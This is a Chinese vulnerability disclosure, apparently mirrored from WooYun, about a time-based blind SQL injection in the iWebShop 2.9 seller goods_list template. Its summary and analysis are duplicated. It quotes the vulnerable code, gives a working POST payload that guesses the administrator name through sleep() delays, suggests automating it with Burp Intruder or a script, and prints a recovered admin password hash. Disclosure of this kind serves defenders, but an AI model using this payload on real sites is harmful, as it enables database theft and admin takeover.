VULHUB ™

### 简要描述： Iwebshop最新版注入又一枚 ### 详细说明： 看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ [WooYun: iWebShop开源电子商务系统SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-087202) ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。 注入一枚：POST /index.php?controller=seller&action=goods_list这个注入藏的相对比较深，在HTML文件中。POST参数中的search作为一个数组传入，search的KEY and VALUE 都过滤不完全，注入成功，文件在/controllers/seller.php的goods_list()方法中 看看代码/controllers/seller.php ``` //商品列表 public function goods_list() { $this->redirect('goods_list'); } ``` 这段代码看似直接重向了，并没有什么参数传入，注入点在哪里呢？ 然后各种跳跳跳，最后一直跟到/views/sysseller/seller/goods_list.html ``` {set:$seller_id = $this->seller['seller_id']} {set:$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1} {set:$condition = IReq::get('search');$where = '';$searchUrl='';} {if:$condition} {foreach:items=$condition} {set:$searchUrl .='&search['.urlencode($key).']='.urlencode($item)} {if:$item !== ""} {if:$key == "go.store_nums"} {set:$where .= ' and '.$key.$item} {else:} {set:$where...

### 简要描述： Iwebshop最新版注入又一枚 ### 详细说明： 看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ [WooYun: iWebShop开源电子商务系统SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-087202) ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。 注入一枚：POST /index.php?controller=seller&action=goods_list这个注入藏的相对比较深，在HTML文件中。POST参数中的search作为一个数组传入，search的KEY and VALUE 都过滤不完全，注入成功，文件在/controllers/seller.php的goods_list()方法中 看看代码/controllers/seller.php ``` //商品列表 public function goods_list() { $this->redirect('goods_list'); } ``` 这段代码看似直接重向了，并没有什么参数传入，注入点在哪里呢？ 然后各种跳跳跳，最后一直跟到/views/sysseller/seller/goods_list.html ``` {set:$seller_id = $this->seller['seller_id']} {set:$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1} {set:$condition = IReq::get('search');$where = '';$searchUrl='';} {if:$condition} {foreach:items=$condition} {set:$searchUrl .='&search['.urlencode($key).']='.urlencode($item)} {if:$item !== ""} {if:$key == "go.store_nums"} {set:$where .= ' and '.$key.$item} {else:} {set:$where .= ' and '.$key.'"'.$item.'"'} {/if} {/if} {/foreach} {/if} ``` condition是这样获得的$condition = IReq::get('search');，去看看IReq::get /lib/core/util/req_class.php ``` public static function get($key, $type=false) { //默认方式 if($type==false) { if(isset($_GET[$key])) return $_GET[$key]; else if(isset($_POST[$key])) return $_POST[$key]; else return null; } //get方式 else if($type=='get' && isset($_GET[$key])) return $_GET[$key]; //post方式 else if($type=='post' && isset($_POST[$key])) return $_POST[$key]; //无匹配 else return null; } ``` 没有经过任何处理，直接把GET、POST的内容传入了 测试方法：申请开店后，登录，添加一件商品，然后发送下面的post包即可。 Payload:POST提交 ``` search[1%3d-1/**/or(select/**/if(ord(mid((select/**/admin_name/**/from/**/iwebshop_admin/**/limit /**/0,1),1,1))%3d97,sleep(1),0))#]=test_goods_list ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟1s左右，如下图 [<img src="https://images.seebug.org/upload/201501/23235439869aa5a2acedb0715e215185d2fa32a3.jpg" alt="猜测失败副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/23235439869aa5a2acedb0715e215185d2fa32a3.jpg) 若正确，延迟4s左右（与你添加的商品数量有关，可以只给自己的店铺添加一件商品）如下图 [<img src="https://images.seebug.org/upload/201501/2323545440c1aa8df4196e5819c24996ebc22192.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2323545440c1aa8df4196e5819c24996ebc22192.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：admin，密码为： f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明： 见 详细说明